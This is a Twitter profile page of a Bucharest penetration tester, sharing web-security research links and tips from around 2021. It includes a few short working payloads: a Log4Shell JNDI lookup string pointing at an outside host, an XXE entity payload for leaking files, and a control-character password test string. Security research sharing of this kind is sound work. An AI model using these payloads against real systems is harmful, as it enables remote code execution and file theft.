Petre Popescu @ptrsec
Penetration tester. Bucharest, Romania. Joined December 2016.
Tweets: 431 - Followers: 124 - Following: 288 - Likes: 973
The results are in! We're proud to announce the Top 10 Web Hacking Techniques of 2021! portswigger.net/research/top-1…
Have you got a tricky XSS filter to bypass? Consuming tags can help because they can fool the filter into incorrectly allowing harmful markup: portswigger.net/web-security/c…
iOS exploits: builds a 64-bit virtual machine from 70,000 AND/OR/XOR/XAND logic gates inside a corrupted PDF just to run jailbreak code Java exploits: ${jndi:ldaps://notnow.dev:3389/lol}
WTF!! This has security implications. JS always surprises me 😮
woooooooooo github.com/tangxiaofeng7/…
In our #HITCON #CTF 2021, I made a PHP warmup challenge that can be only solved by Norway teams. Could you spot the vulnerability? gist.github.com/orangetw/76504…
If you're exploiting your XXE under Java, I recommend a payload like this: <!DOCTYPE root [ <!ENTITY stuff SYSTEM "."> ]><root>&stuff;</root> So that you can start the file leak from the CWD of the Java process. This is important when chaining for an RCE.
We've posted some in-depth guidance on how to make Turbo Intruder attacks go as fast as possible. If you think we're missing any tricks, let us know! portswigger.net/research/turbo…
DEF CON 29 - Ionut Cernica - Hack the hackers Leaking data over SSL TLS youtube.com/watch?v=WNXEuF…
HTTP/2: The Sequel is Always Worse by @albinowax portswigger.net/research/http2
Kubernetes Hardening guide by the NSA: media.defense.gov/2021/Aug/03/20…
New blog post: joonas.fi/2021/08/saml-i…
Parsing differentials are my favourite breed of bugs these days. Nice example thezdi.com/blog/2021/7/7/…
Finding DOM Polyglot XSS in PayPal the Easy Way by @garethheyes portswigger.net/research/findi…
Spring and FreeMarker Template Injection? You can still read any file under TemplateClassResolver.SAFER_RESOLVER. This was enough for me to get RCE.
Need to exploit blind XXE but limited to the file:// protocol? Turns out file URLs can trigger FTP connections in Java! Nice finding by @airrera / @Immunityinc immunityservices.blogspot.com/2021/02/miscon…
Just Published a write-up. "The Secret Parameter, LFR, and Potential RCE in NodeJS Apps" blog.shoebpatel.com/2021/01/23/The… #BugBountytip #BugBounty #NodeJS #ctf
When testing password fields, my preferred password is: %01%E2%80%AEalert%0D%0A Let's break it down: %01 is SOH %e2%80%ae is RTLO %0d%0a is CRLF Test cases on login: 1. can I log in only using %01? 2. without the CRLF in it? 3. is trela accepted instead of alert? (due to RTLO)
GHSL-2020-205: Remote Code Execution in Apache Struts 2 - S2-061 - CVE-2020-17530 github.co/2W9jOod
